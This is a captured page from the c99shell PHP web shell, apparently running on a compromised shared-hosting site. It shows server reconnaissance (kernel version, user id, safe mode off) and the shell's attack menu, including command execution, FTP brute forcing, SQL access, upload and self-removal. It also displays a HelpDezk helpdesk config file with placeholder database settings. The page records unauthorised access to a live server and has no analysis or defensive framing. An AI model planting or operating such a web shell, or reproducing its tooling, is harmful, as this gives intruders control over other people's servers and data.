smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/var/softaculous/helpdezk/   drwxr-xr-x
Free 423.13 GB of 543.66 GB (77.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (1.79 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 


date_default_timezone_set
('America/New_York') ;


//DATABASE CONFIGURATION
$config["db_connect"]      =     "mysqli"//mysqli = MYSQL | oci8po = Oracle 
$config["db_hostname"]      =     "[[softdbhost]]";
$config["db_port"]          =     "3306";
$config["db_name"]          =     "[[softdb]]";
$config["db_username"]      =     "[[softdbuser]]";
$config["db_password"]      =     "[[softdbpass]]";


//SYSTEM CONFIGURATION
$config["hdk_url"]      =     "[[softurl]]";
$config["path_default"]      =     "[[relativeurl_]]";
$config["lang"]      =     "en_US";
$config["theme"]      =     "parracho";
$config["page_title"]      =     " [HELPDEZK] - Parracho - A free open source Helpdesk software! ";
$config["jquery"]      =     "jquery-2.1.1.js";


//EXTERNAL STORAGE CONFIGURATION
$config["external_storage"]          =     false 
$config["external_storage_path"]      =      'puth_external_storage_path_here' ;
$config["external_storage_url"]      =      'puth_external_storage_url_here' 


//LOCATION CONFIGURATION
if($config["lang"] == 'en_US') {
     
$config["id_mask"]      =     "999-99-9999";
     
$config["ein_mask"]      =     "99-9999999";
     
$config["zip_mask"]      =     "00000";
     
$config["phone_mask"]      =     "(000) 000-0000";
     
$config["cellphone_mask"]      =     "(00) 00000-0000";
     
$config["date_placeholder"]      =     "mm/dd/yyyy";
     
$config["log_date_format"]      =     "%m/%d/%Y %H:%i:%s";
     
$config["date_format"]      =     "%m/%d/%Y";
     
$config["hour_format"]      =     "%h:%i %p";
}
if(
$config["lang"] == 'pt_BR') {
     
$config["id_mask"]      =     " ?999.999.999-99";
     
$config["ein_mask"]      =     " ?99.999.999/9999-99 ";
     
$config["zip_mask"]      =     "00000-000";
     
$config["phone_mask"]      =     "(00) 0000-0000";
     
$config["cellphone_mask"]      =     "(00) 00000-0000";
     
$config["date_placeholder"]      =     "dd/mm/yyyy";
     
$config["log_date_format"]      =     "%d/%m/%Y %H:%i:%s";
     
$config["date_format"]      =     "%d/%m/%Y";
     
$config["hour_format"]      =     "%H:%i";
}



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0084 ]--